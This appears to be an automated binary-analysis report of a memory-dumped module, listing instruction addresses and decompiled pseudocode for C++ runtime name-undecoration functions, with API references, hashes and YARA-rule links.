0x6e1b0545
0x6e1b0548
0x6e1b054b
0x00000000
0x00000000
0x6e1b0551
0x6e1b0555
0x00000000
0x00000000
0x6e1b0557
0x6e1b055a
0x6e1b055d
0x00000000
0x00000000
0x6e1b0563
0x6e1b0567
0x00000000
0x00000000
0x6e1b0569
0x6e1b056c
0x6e1b056f
0x00000000
0x00000000
0x6e1b0575
0x6e1b0579
0x00000000
0x00000000
0x6e1b057b
0x6e1b057e
0x6e1b0581
0x00000000
0x00000000
0x6e1b0587
0x6e1b058b
0x00000000
0x00000000
0x6e1b0591
0x6e1b0594
0x6e1b0597
0x00000000
0x00000000
0x6e1b059d
0x6e1b05a1
0x00000000
0x00000000
0x6e1b05a7
0x6e1b05aa
0x6e1b05ad
0x00000000
0x00000000
0x6e1b05b3
0x6e1b05b7
0x00000000
0x00000000
0x6e1b05bd
0x6e1b05c0
0x6e1b05c3
0x00000000
0x00000000
0x6e1b05c9
0x6e1b05cd
0x00000000
0x00000000
0x6e1b05d3
0x6e1b05d6
0x6e1b05d9
0x00000000
0x00000000
0x6e1b05db
0x6e1b05df
0x00000000
0x00000000
0x6e1b05e5
0x6e1b05e8
0x6e1b05eb
0x00000000
0x00000000
0x6e1b05ed
0x6e1b05f1
0x00000000
0x00000000
0x6e1b05f7
0x6e1b05fa
0x6e1b05fd
0x00000000
0x00000000
0x6e1b05ff
0x6e1b0603
0x00000000
0x00000000
0x6e1b0609
0x6e1b060c
0x6e1b060f
0x00000000
0x00000000
0x6e1b0611
0x6e1b0615
0x00000000
0x00000000
0x6e1b061b
0x6e1b0621
0x6e1b0624
0x00000000
0x00000000
0x6e1b0626
0x6e1b062d
0x00000000
0x00000000
0x6e1b062f
0x00000000
0x6e1b0503
0x6e1b04d8
0x00000000
0x6e1b0649
0x6e1b0649
0x6e1b064c
0x6e1b064f
0x6e1b065b
0x6e1b065b
0x6e1b065b
0x6e1b065e
0x6e1b0661
0x6e1b0670
0x6e1b0670
0x00000000
0x6e1b0670
0x6e1b0663
0x6e1b0663
0x6e1b0666
0x6e1b0668
0x6e1b0668
0x6e1b0668
0x6e1b066b
0x00000000
0x6e1b066b
0x6e1b0651
0x6e1b0654
0x00000000
0x00000000
0x6e1b0656
0x6e1b0656
0x00000000
0x6e1b0656
0x6e1b04c4
0x6e1b045f
0x6e1b0462
0x00000000
0x00000000
0x6e1b0464
0x6e1b0466
0x6e1b046a
0x6e1b046b
0x6e1b046b
0x6e1b0472
0x00000000
0x6e1b0472
0x6e1b0445
0x6e1b0447
0x6e1b044b
0x6e1b044c
0x6e1b044c
0x00000000
0x6e1b0447
0x6e1b0431
0x6e1b0431
0x6e1b0434
0x6e1b0436
0x6e1b0436
0x6e1b0436
0x6e1b0439
0x00000000
0x6e1b0439
0x6e1b041f
0x6e1b0422
0x00000000
0x00000000
0x6e1b0424
0x6e1b0424
0x00000000
0x6e1b0424
0x6e1b029f
0x6e1b02a3
0x6e1b02af
0x6e1b02b2
0x6e1b0402
0x6e1b0409
0x6e1b02e9
0x6e1b02ec
0x6e1b0412
0x6e1b0412
0x6e1b0415
0x00000000
0x00000000
0x00000000
0x6e1b0415
0x6e1b040f
0x6e1b040f
0x00000000
0x6e1b040f
0x6e1b02b8
0x6e1b02bb
0x00000000
0x00000000
0x6e1b02c1
0x6e1b02c8
0x6e1b02d7
0x6e1b02da
0x6e1b02dd
0x00000000
0x00000000
0x6e1b02e3
0x6e1b02e7
0x6e1b02f3
0x6e1b02f6
0x6e1b02f9
0x00000000
0x00000000
0x6e1b02ff
0x6e1b0303
0x00000000
0x00000000
0x6e1b0305
0x6e1b0308
0x6e1b030b
0x00000000
0x00000000
0x6e1b0311
0x6e1b0315
0x00000000
0x00000000
0x6e1b0317
0x6e1b031a
0x6e1b031d
0x00000000
0x00000000
0x6e1b0323
0x6e1b0327
0x00000000
0x00000000
0x6e1b0329
0x6e1b032c
0x6e1b032f
0x00000000
0x00000000
0x6e1b0335
0x6e1b0339
0x00000000
0x00000000
0x6e1b033b
0x6e1b033e
0x6e1b0341
0x00000000
0x00000000
0x6e1b0347
0x6e1b034b
0x00000000
0x00000000
0x6e1b034d
0x6e1b0350
0x6e1b0353
0x00000000
0x00000000
0x6e1b0359
0x6e1b035d
0x00000000
0x00000000
0x6e1b035f
0x6e1b0362
0x6e1b0365
0x00000000
0x00000000
0x6e1b036b
0x6e1b036f
0x00000000
0x00000000
0x6e1b0375
0x6e1b0378
0x6e1b037b
0x00000000
0x00000000
0x6e1b0381
0x6e1b0385
0x00000000
0x00000000
0x6e1b038b
0x6e1b038e
0x6e1b0391
0x00000000
0x00000000
0x6e1b0397
0x6e1b039b
0x00000000
0x00000000
0x6e1b03a1
0x6e1b03a4
0x6e1b03a7
0x00000000
0x00000000
0x6e1b03a9
0x6e1b03ad
0x00000000
0x00000000
0x6e1b03b3
0x6e1b03b6
0x6e1b03b9
0x00000000
0x00000000
0x6e1b03bb
0x6e1b03bf
0x00000000
0x00000000
0x6e1b03c5
0x6e1b03c8
0x6e1b03cb
0x00000000
0x00000000
0x6e1b03cd
0x6e1b03d1
0x00000000
0x00000000
0x6e1b03d7
0x6e1b03da
0x6e1b03dd
0x00000000
0x00000000
0x6e1b03df
0x6e1b03e3
0x00000000
0x00000000
0x6e1b03e9
0x6e1b03ef
0x6e1b03f2
0x00000000
0x00000000
0x6e1b03f4
0x6e1b03fb
0x00000000
0x00000000
0x6e1b03fd
0x00000000
0x6e1b02e7
0x6e1b02cd
0x00000000
0x6e1b02cd
0x6e1b02a8
0x00000000
0x6e1b02a8
0x6e1b028d
0x6e1b0290
0x00000000
0x00000000
0x00000000
0x6e1b0290
0x6e1b0179
0x6e1b0179
0x6e1b017c
0x6e1b017f
0x6e1b0181
0x00000000
0x6e1b0181
0x6e1b016e
0x00000000
0x6e1b016e
0x6e1b00ed
0x6e1b00f4
0x6e1b00f9
0x6e1b00ff
0x00000000
0x6e1b00ff
0x6e1b00ef
0x6e1b00f2
0x00000000
0x00000000
0x00000000
0x6e1b00f2

APIs

__aulldvrm.LIBCMT ref: 6E1B04A4

Strings

f, xrefs: 6E1B01B2
:, xrefs: 6E1B0189
f, xrefs: 6E1B01CE
p, xrefs: 6E1B01D5
f, xrefs: 6E1B0214
p, xrefs: 6E1B021B
p, xrefs: 6E1B01B9

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldvrm
String ID: :$f$f$f$p$p$p
API String ID: 1302938615-1434680307
Opcode ID: 13140b55f7074578470f2240e46636c53c0e2750ed2535541c28a4bc365171b2
Instruction ID: 664b3163be670ff1f9dc25bcd8f9d22dc133f3633e971963e52e4ee3d6b04cd7
Opcode Fuzzy Hash: 13140b55f7074578470f2240e46636c53c0e2750ed2535541c28a4bc365171b2
Instruction Fuzzy Hash: 4D02A275B00219CAEB20CFE5C6A56DEB7B6FB44714F614556D1247B680FB308EC8EB22

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1DC5, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E1A1DC5(void* __edx, void* __eflags, intOrPtr* _a4) {
				char _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t25;
				intOrPtr _t26;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t30;
				void* _t35;
				intOrPtr* _t37;
				void* _t39;
				char _t40;
				intOrPtr _t41;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t61;

				_t61 = _a4;
				 *_t61 = 0;
				 *((intOrPtr*)(_t61 + 4)) = 0;
				_t25 = E6E1A315F(_t39, __edx, 0, _t61,  &_v12, 1, 0);
				_t41 =  *_t25;
				 *_t61 = _t41;
				_t26 =  *((intOrPtr*)(_t25 + 4));
				 *((intOrPtr*)(_t61 + 4)) = _t26;
				_t27 =  *0x6e21304c; // 0x0
				_t40 = 2;
				if(_t26 != 0) {
					L4:
					_t58 =  *_t27;
					if(_t58 != 0x40) {
						if(_t58 == 0) {
							_push(1);
							if(_t41 != 0) {
								_v12 = "::";
								_v8 = _t40;
								_t28 = E6E19D50F( &_v36);
								_t19 =  &_v12; // 0x6e205230
								_t30 = E6E19D8A2(E6E19D880(_t28,  &_v28, _t19),  &_v20, _t61);
								 *_t61 =  *_t30;
								 *((intOrPtr*)(_t61 + 4)) =  *((intOrPtr*)(_t30 + 4));
							} else {
								E6E19D795(_t61);
							}
						} else {
							 *((intOrPtr*)(_t61 + 4)) = 0;
							 *((char*)(_t61 + 4)) = _t40;
							 *_t61 = 0;
						}
						L11:
						return _t61;
					}
					L5:
					 *0x6e21304c = _t27 + 1;
					goto L11;
				}
				_t59 =  *_t27;
				if(_t59 == 0) {
					goto L4;
				}
				if(_t59 == 0x40) {
					goto L5;
				} else {
					_v12 = "::";
					_v8 = _t40;
					_t35 = E6E1A1A13(_t59,  &_v20);
					_t9 =  &_v12; // 0x6e205230
					_t37 = E6E19D8A2(E6E19D880(_t35,  &_v28, _t9),  &_v36, _t61);
					_t41 =  *_t37;
					 *_t61 = _t41;
					 *((intOrPtr*)(_t61 + 4)) =  *((intOrPtr*)(_t37 + 4));
					_t27 =  *0x6e21304c; // 0x0
					goto L4;
				}
			}

0x6e1a1dd0
0x6e1a1dda
0x6e1a1ddc
0x6e1a1ddf
0x6e1a1de7
0x6e1a1de9
0x6e1a1deb
0x6e1a1df2
0x6e1a1df5
0x6e1a1dfa
0x6e1a1dfb
0x6e1a1e46
0x6e1a1e46
0x6e1a1e4b
0x6e1a1e57
0x6e1a1e63
0x6e1a1e67
0x6e1a1e75
0x6e1a1e7c
0x6e1a1e7f
0x6e1a1e84
0x6e1a1e9a
0x6e1a1ea1
0x6e1a1ea6
0x6e1a1e69
0x6e1a1e6b
0x6e1a1e6b
0x6e1a1e59
0x6e1a1e59
0x6e1a1e5c
0x6e1a1e5f
0x6e1a1e5f
0x6e1a1eaa
0x6e1a1eaf
0x6e1a1eaf
0x6e1a1e4d
0x6e1a1e4e
0x00000000
0x6e1a1e4e
0x6e1a1dfd
0x6e1a1e01
0x00000000
0x00000000
0x6e1a1e06
0x00000000
0x6e1a1e08
0x6e1a1e0b
0x6e1a1e13
0x6e1a1e16
0x6e1a1e1c
0x6e1a1e32
0x6e1a1e37
0x6e1a1e39
0x6e1a1e3e
0x6e1a1e41
0x00000000
0x6e1a1e41

APIs

Part of subcall function 6E1A315F: Replicator::operator[].LIBVCRUNTIME ref: 6E1A319C

DName::operator=.LIBVCRUNTIME ref: 6E1A1E6B

Part of subcall function 6E1A1A13: DName::operator+.LIBCMT ref: 6E1A1A7E
Part of subcall function 6E1A1A13: DName::operator+.LIBCMT ref: 6E1A1D3C

DName::operator+.LIBCMT ref: 6E1A1E26
DName::operator+.LIBCMT ref: 6E1A1E32
DName::DName.LIBVCRUNTIME ref: 6E1A1E7F
DName::operator+.LIBCMT ref: 6E1A1E8E
DName::operator+.LIBCMT ref: 6E1A1E9A

Strings

0R n, xrefs: 6E1A1DD0, 6E1A1DCB
0R n, xrefs: 6E1A1E1C, 6E1A1E1F

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
String ID: 0R n$0R n
API String ID: 955152517-3064239159
Opcode ID: 21f130dc7754a8dea2860dfef04fe00f369ac773b0464ec7adcacfe2a8628236
Instruction ID: 2ac200f53038858fd4fc8bd63e0517709362fa580bf7916ef3b0fe750130c52b
Opcode Fuzzy Hash: 21f130dc7754a8dea2860dfef04fe00f369ac773b0464ec7adcacfe2a8628236
Instruction Fuzzy Hash: 4331E4B5A00204DFCB18CFD8C491AEEBBFABF59300F10481DE28697341D7359688DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A3009, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1A3009(intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				intOrPtr _t27;
				char* _t29;
				intOrPtr _t38;
				char* _t39;
				void* _t48;
				intOrPtr* _t55;
				intOrPtr* _t65;
				intOrPtr _t67;
				char _t73;
				intOrPtr* _t75;
				void* _t77;
				void* _t78;

				_t55 = _a8;
				_t78 = _t77 - 0x20;
				_t75 = _a4;
				 *_t75 =  *_t55;
				_t27 =  *((intOrPtr*)(_t55 + 4));
				 *((intOrPtr*)(_t75 + 4)) = _t27;
				if(_t27 <= 1) {
					_t29 =  *0x6e21304c; // 0x0
					if( *_t29 == 0) {
						E6E19D8A2(E6E19D50F( &_v36, 1),  &_v12, _t75);
						 *_t75 = _v12;
						 *((intOrPtr*)(_t75 + 4)) = _v8;
					} else {
						E6E19FC95( &_v12);
						_t65 = E6E19D8A2(E6E19D8C4( &_v12,  &_v20, 0x20),  &_v28, _t75);
						 *_t75 =  *_t65;
						_t38 =  *((intOrPtr*)(_t65 + 4));
						 *((intOrPtr*)(_t75 + 4)) = _t38;
						if(_t38 <= 1) {
							_t39 =  *0x6e21304c; // 0x0
							if( *_t39 == 0x40) {
								L19:
								 *0x6e21304c = _t39 + 1;
							} else {
								_v12 = "{for ";
								_v8 = 5;
								while(1) {
									L5:
									E6E19D944(_t75,  &_v12);
									_t67 =  *((intOrPtr*)(_t75 + 4));
									_t39 =  *0x6e21304c; // 0x0
									while(_t67 <= 1) {
										_t73 =  *_t39;
										if(_t73 == 0) {
											L15:
											if( *_t39 == 0) {
												E6E19DAAC(_t75, 1);
											}
											E6E19D9F3(_t75, 0x7d);
											_t39 =  *0x6e21304c; // 0x0
										} else {
											if(_t73 == 0x40) {
												if(_t67 <= 1) {
													goto L15;
												}
											} else {
												_t48 = E6E19D833(_t67,  &_v20, 0x60, E6E1A1A13(_t73,  &_v28));
												_t78 = _t78 + 0x10;
												E6E19D99C(_t75, E6E19D8C4(_t48,  &_v36, 0x27));
												_t39 =  *0x6e21304c; // 0x0
												if( *_t39 == 0x40) {
													_t39 = _t39 + 1;
													 *0x6e21304c = _t39;
												}
												_t67 =  *((intOrPtr*)(_t75 + 4));
												if(_t67 <= 1) {
													if( *_t39 == 0x40) {
														continue;
													} else {
														_v12 = "s ";
														_v8 = 2;
														goto L5;
													}
													goto L21;
												}
											}
										}
										break;
									}
									if( *_t39 == 0x40) {
										goto L19;
									}
									goto L21;
								}
							}
						}
					}
				}
				L21:
				return _t75;
			}

0x6e1a300c
0x6e1a300f
0x6e1a3016
0x6e1a301c
0x6e1a301e
0x6e1a3021
0x6e1a3026
0x6e1a302c
0x6e1a3034
0x6e1a3149
0x6e1a3151
0x6e1a3156
0x6e1a303a
0x6e1a303e
0x6e1a305e
0x6e1a3062
0x6e1a3064
0x6e1a3067
0x6e1a306c
0x6e1a3072
0x6e1a307a
0x6e1a3131
0x6e1a3132
0x6e1a3080
0x6e1a3080
0x6e1a3087
0x6e1a308e
0x6e1a308e
0x6e1a3094
0x6e1a3099
0x6e1a309c
0x6e1a30a1
0x6e1a30a9
0x6e1a30ad
0x6e1a3111
0x6e1a3114
0x6e1a3119
0x6e1a3119
0x6e1a3122
0x6e1a3127
0x6e1a30af
0x6e1a30b2
0x6e1a310f
0x00000000
0x00000000
0x6e1a30b4
0x6e1a30c4
0x6e1a30c9
0x6e1a30dc
0x6e1a30e1
0x6e1a30e9
0x6e1a30eb
0x6e1a30ec
0x6e1a30ec
0x6e1a30f1
0x6e1a30f6
0x6e1a30fb
0x00000000
0x6e1a30fd
0x6e1a30fd
0x6e1a3104
0x00000000
0x6e1a3104
0x00000000
0x6e1a30fb
0x6e1a30f6
0x6e1a30b2
0x00000000
0x6e1a30ad
0x6e1a312f
0x00000000
0x00000000
0x00000000
0x6e1a312f
0x6e1a308e
0x6e1a307a
0x6e1a306c
0x6e1a3034
0x6e1a3159
0x6e1a315e

APIs

DName::operator+.LIBCMT ref: 6E1A304D
DName::operator+.LIBCMT ref: 6E1A3059

Part of subcall function 6E19D944: shared_ptr.LIBCMT ref: 6E19D960

DName::operator+=.LIBCMT ref: 6E1A3119

Part of subcall function 6E1A1A13: DName::operator+.LIBCMT ref: 6E1A1A7E
Part of subcall function 6E1A1A13: DName::operator+.LIBCMT ref: 6E1A1D3C

Part of subcall function 6E19D833: DName::operator+.LIBCMT ref: 6E19D854

DName::operator+.LIBCMT ref: 6E1A30D4

Part of subcall function 6E19D99C: DName::operator=.LIBVCRUNTIME ref: 6E19D9BD

DName::DName.LIBVCRUNTIME ref: 6E1A313D
DName::operator+.LIBCMT ref: 6E1A3149

Strings

,V n, xrefs: 6E1A30FD

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
String ID: ,V n
API String ID: 2795783184-2619340133
Opcode ID: 255dde44778f7942d65d2612f5900f9ccb69a9613514ba4c85d94f05d0116e6b
Instruction ID: 254f234ecb8e2b42702e220fcc7e4e93681af3b1c205b13eba9668b6d6f6de01
Opcode Fuzzy Hash: 255dde44778f7942d65d2612f5900f9ccb69a9613514ba4c85d94f05d0116e6b
Instruction Fuzzy Hash: 8B41B6B4A00244EFDF10DFE8C859BEE7BFAAB06704F50445DD28597281DB789AC1EB64

Uniqueness

Uniqueness Score: -1.00%

Function 6E19FD9A, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 201
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E6E19FD9A(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
				signed int _t81;
				signed int _t82;
				signed int* _t84;
				signed int _t86;
				signed int _t91;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t102;
				void* _t107;
				signed int* _t108;
				signed int _t111;
				signed int* _t113;
				signed int _t120;
				signed int _t125;
				signed int _t127;
				signed int _t130;
				void* _t136;
				signed int _t152;
				signed int _t155;
				void* _t156;

				_t149 = __edi;
				_t124 = __ebx;
				_push(0x28);
				E6E1CAD3A(0x6e203414, __ebx, __edi);
				 *0x6e213064 =  *0x6e213064 + 1;
				_t81 =  *0x6e213054; // 0x0
				 *((intOrPtr*)(_t156 - 4)) = 0;
				if((0x00002000 & _t81) == 0) {
					_t82 =  *0x6e21304c; // 0x0
					_t127 =  *_t82;
					__eflags = _t127 - 0x3f;
					if(_t127 != 0x3f) {
						__eflags = _t127;
						if(_t127 == 0) {
							E6E19D50F( *(_t156 + 8), 1);
							L43:
							_t84 =  *(_t156 + 8);
							L44:
							 *0x6e213064 =  *0x6e213064 - 1;
							return E6E1CAD03(_t84);
						}
						_t84 =  *(_t156 + 8);
						_t84[1] = 0;
						_t84[1] = 2;
						 *_t84 = 0;
						goto L44;
					}
					_t86 = _t82 + 1;
					 *0x6e21304c = _t86;
					__eflags =  *_t86 - _t127;
					if( *_t86 != _t127) {
						L10:
						E6E1A21A0(_t124, 0, _t149, 0x2000, _t156 - 0x18);
						_t155 =  *(_t156 - 0x18);
						_t125 =  *(_t156 - 0x14);
						__eflags = _t155;
						if(_t155 == 0) {
							L13:
							_t17 = _t156 - 0x10;
							 *_t17 =  *(_t156 - 0x10) & 0x00000000;
							__eflags =  *_t17;
							L14:
							_t152 = _t125 >> 0x0000000f & 1;
							__eflags = _t125 - 1;
							if(_t125 <= 1) {
								_t91 =  *0x6e21304c; // 0x0
								_t92 =  *_t91;
								__eflags = _t92;
								if(_t92 == 0) {
									L24:
									_t130 =  *(_t156 - 0x10);
									__eflags = _t130;
									if(_t130 != 0) {
										__eflags = _t155;
										if(_t155 != 0) {
											_t125 = _t125 | 0x00000200;
											__eflags = _t125;
											 *(_t156 - 0x14) = _t125;
										}
									}
									__eflags = _t152;
									if(_t152 != 0) {
										_t125 = _t125 | 0x00008000;
										__eflags = _t125;
										 *(_t156 - 0x14) = _t125;
									}
									__eflags = _t155;
									if(_t155 == 0) {
										goto L15;
									} else {
										__eflags = 0x00001000 & _t125;
										if((0x00001000 & _t125) != 0) {
											goto L15;
										}
										_t93 =  *0x6e21304c; // 0x0
										_t94 =  *_t93;
										__eflags = _t94;
										if(_t94 == 0) {
											L35:
											__eflags =  *0x6e213054 & 0x00001000;
											if(( *0x6e213054 & 0x00001000) == 0) {
												L39:
												E6E19DBDC( *(_t156 + 8), _t156 - 0x18);
												goto L43;
											}
											__eflags = _t130;
											if(_t130 != 0) {
												goto L39;
											}
											__eflags = 0x00008000 & _t125;
											if((0x00008000 & _t125) != 0) {
												goto L39;
											}
											 *(_t156 - 0x30) =  *(_t156 - 0x30) & _t130;
											 *(_t156 - 0x2c) =  *(_t156 - 0x2c) & _t130;
											E6E19DBDC(_t156 - 0x28, _t156 - 0x30);
											goto L15;
										}
										__eflags = _t94 - 0x40;
										if(_t94 == 0x40) {
											 *0x6e21304c =  *0x6e21304c + 1;
											__eflags =  *0x6e21304c;
											goto L35;
										}
										_t84 =  *(_t156 + 8);
										_t84[1] = _t84[1] & 0x00000000;
										 *_t84 =  *_t84 & 0x00000000;
										_t84[1] = 2;
										goto L44;
									}
								}
								__eflags = _t92 - 0x40;
								if(_t92 == 0x40) {
									goto L24;
								}
								E6E1A1A13(0, _t156 - 0x28);
								_t102 =  *(_t156 - 0x28);
								__eflags = _t102;
								if(_t102 == 0) {
									goto L24;
								}
								__eflags =  *0x6e213058;
								_t136 = _t156 - 0x20;
								if( *0x6e213058 == 0) {
									 *(_t156 - 0x20) = _t102;
									 *(_t156 - 0x1c) =  *(_t156 - 0x24);
									 *(_t156 - 0x30) = "::";
									 *(_t156 - 0x2c) = 2;
									E6E19D944(_t136, _t156 - 0x30);
									_push(_t156 - 0x18);
									_t107 = _t156 - 0x28;
									L23:
									_push(_t107);
									_t108 = E6E19D8A2(_t156 - 0x20);
									_t125 = _t108[1];
									_t155 =  *_t108;
									 *(_t156 - 0x14) = _t125;
									 *(_t156 - 0x18) = _t155;
									goto L24;
								}
								 *0x6e213058 = 0;
								 *(_t156 - 0x20) = _t155;
								 *(_t156 - 0x1c) = _t125;
								E6E19D99C(_t136, _t156 - 0x28);
								_t111 =  *0x6e21304c; // 0x0
								_t155 =  *(_t156 - 0x20);
								_t125 =  *(_t156 - 0x1c);
								 *(_t156 - 0x18) = _t155;
								__eflags =  *_t111 - 0x40;
								 *(_t156 - 0x14) = _t125;
								if( *_t111 == 0x40) {
									goto L24;
								}
								_t113 = E6E1A1A13(0, _t156 - 0x30);
								 *(_t156 - 0x28) = "::";
								 *(_t156 - 0x24) = 2;
								 *(_t156 - 0x1c) = _t113[1];
								 *(_t156 - 0x20) =  *_t113;
								E6E19D944(_t156 - 0x20, _t156 - 0x28);
								_push(_t156 - 0x18);
								_t107 = _t156 - 0x30;
								goto L23;
							}
							L15:
							_t84 =  *(_t156 + 8);
							 *_t84 = _t155;
							_t84[1] = _t125;
							goto L44;
						}
						__eflags = _t125 & 0x00000200;
						if((_t125 & 0x00000200) == 0) {
							goto L13;
						}
						 *(_t156 - 0x10) = 1;
						goto L14;
					}
					__eflags =  *((intOrPtr*)(_t86 + 1)) - _t127;
					if(__eflags != 0) {
						goto L10;
					}
					_push(_t156 - 0x28);
					E6E19FD9A(_t124, _t127, 0, __edi, __eflags);
					_t120 =  *0x6e21304c; // 0x0
					while(1) {
						__eflags =  *_t120;
						if( *_t120 == 0) {
							break;
						}
						_t120 = _t120 + 1;
						__eflags = _t120;
						 *0x6e21304c = _t120;
					}
					L2:
					_t84 =  *(_t156 + 8);
					 *_t84 =  *(_t156 - 0x28);
					_t84[1] =  *(_t156 - 0x24);
					goto L44;
				}
				 *0x6e213054 = _t81 & 0xffffdfff;
				E6E19FCC3(_t124, _t156 - 0x28, 0);
				 *0x6e213054 =  *0x6e213054 | 0x00002000;
				goto L2;
			}

0x6e19fd9a
0x6e19fd9a
0x6e19fd9a
0x6e19fda1
0x6e19fda6
0x6e19fdac
0x6e19fdb8
0x6e19fdbd
0x6e19fdee
0x6e19fdf3
0x6e19fdf5
0x6e19fdf8
0x6e19ffd9
0x6e19ffdb
0x6e19fff0
0x6e19fff5
0x6e19fff5
0x6e19fff8
0x6e19fff8
0x6e1a0003
0x6e1a0003
0x6e19ffdd
0x6e19ffe0
0x6e19ffe3
0x6e19ffe7
0x00000000
0x6e19ffe7
0x6e19fdfe
0x6e19fdff
0x6e19fe04
0x6e19fe06
0x6e19fe2b
0x6e19fe2f
0x6e19fe34
0x6e19fe39
0x6e19fe3e
0x6e19fe40
0x6e19fe4f
0x6e19fe4f
0x6e19fe4f
0x6e19fe4f
0x6e19fe53
0x6e19fe58
0x6e19fe5a
0x6e19fe5d
0x6e19fe6c
0x6e19fe71
0x6e19fe73
0x6e19fe75
0x6e19ff43
0x6e19ff43
0x6e19ff46
0x6e19ff48
0x6e19ff4a
0x6e19ff4c
0x6e19ff4e
0x6e19ff4e
0x6e19ff54
0x6e19ff54
0x6e19ff4c
0x6e19ff5c
0x6e19ff5e
0x6e19ff60
0x6e19ff60
0x6e19ff62
0x6e19ff62
0x6e19ff65
0x6e19ff67
0x00000000
0x6e19ff6d
0x6e19ff72
0x6e19ff74
0x00000000
0x00000000
0x6e19ff7a
0x6e19ff7f
0x6e19ff81
0x6e19ff83
0x6e19ff9f
0x6e19ff9f
0x6e19ffa5
0x6e19ffc9
0x6e19ffd0
0x00000000
0x6e19ffd6
0x6e19ffa7
0x6e19ffa9
0x00000000
0x00000000
0x6e19ffab
0x6e19ffad
0x00000000
0x00000000
0x6e19ffaf
0x6e19ffb5
0x6e19ffbd
0x00000000
0x6e19ffc3
0x6e19ff85
0x6e19ff87
0x6e19ff99
0x6e19ff99
0x00000000
0x6e19ff99
0x6e19ff89
0x6e19ff8c
0x6e19ff90
0x6e19ff93
0x00000000
0x6e19ff93
0x6e19ff67
0x6e19fe7b
0x6e19fe7d
0x00000000
0x00000000
0x6e19fe87
0x6e19fe8c
0x6e19fe90
0x6e19fe92
0x00000000
0x00000000
0x6e19fe98
0x6e19fe9f
0x6e19fea2
0x6e19ff08
0x6e19ff0e
0x6e19ff15
0x6e19ff1c
0x6e19ff23
0x6e19ff2b
0x6e19ff2c
0x6e19ff2f
0x6e19ff2f
0x6e19ff33
0x6e19ff38
0x6e19ff3b
0x6e19ff3d
0x6e19ff40
0x00000000
0x6e19ff40
0x6e19fea7
0x6e19feaf
0x6e19feb2
0x6e19feb5
0x6e19feba
0x6e19febf
0x6e19fec2
0x6e19fec5
0x6e19fec8
0x6e19fecb
0x6e19fece
0x00000000
0x00000000
0x6e19fed4
0x6e19feda
0x6e19fee1
0x6e19feed
0x6e19fef3
0x6e19fefa
0x6e19ff02
0x6e19ff03
0x00000000
0x6e19ff03
0x6e19fe5f
0x6e19fe5f
0x6e19fe62
0x6e19fe64
0x00000000
0x6e19fe64
0x6e19fe42
0x6e19fe48
0x00000000
0x00000000
0x6e19fe4a
0x00000000
0x6e19fe4a
0x6e19fe08
0x6e19fe0b
0x00000000
0x00000000
0x6e19fe10
0x6e19fe11
0x6e19fe16
0x6e19fe24
0x6e19fe24
0x6e19fe27
0x00000000
0x00000000
0x6e19fe1e
0x6e19fe1e
0x6e19fe1f
0x6e19fe1f
0x6e19fddb
0x6e19fddb
0x6e19fde1
0x6e19fde6
0x00000000
0x6e19fde6
0x6e19fdc4
0x6e19fdce
0x6e19fdd3
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 6E19FDA1
UnDecorator::getSymbolName.LIBCMT ref: 6E19FE2F
DName::operator+.LIBCMT ref: 6E19FF33

Part of subcall function 6E19D944: shared_ptr.LIBCMT ref: 6E19D960

DName::DName.LIBVCRUNTIME ref: 6E19FFF0

Strings

0R n, xrefs: 6E19FF15
0R n, xrefs: 6E19FEDA

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: Name$Decorator::getH_prolog3Name::Name::operator+Symbolshared_ptr
String ID: 0R n$0R n
API String ID: 334624791-3064239159
Opcode ID: b3bda0a671ceaaa215c3d57212c02d4110ca513217ad7023948c40098f4758e6
Instruction ID: e0b1eadd65d62960c087d6a73e4782213d2538562ba3cc15850fbe565df6f813
Opcode Fuzzy Hash: b3bda0a671ceaaa215c3d57212c02d4110ca513217ad7023948c40098f4758e6
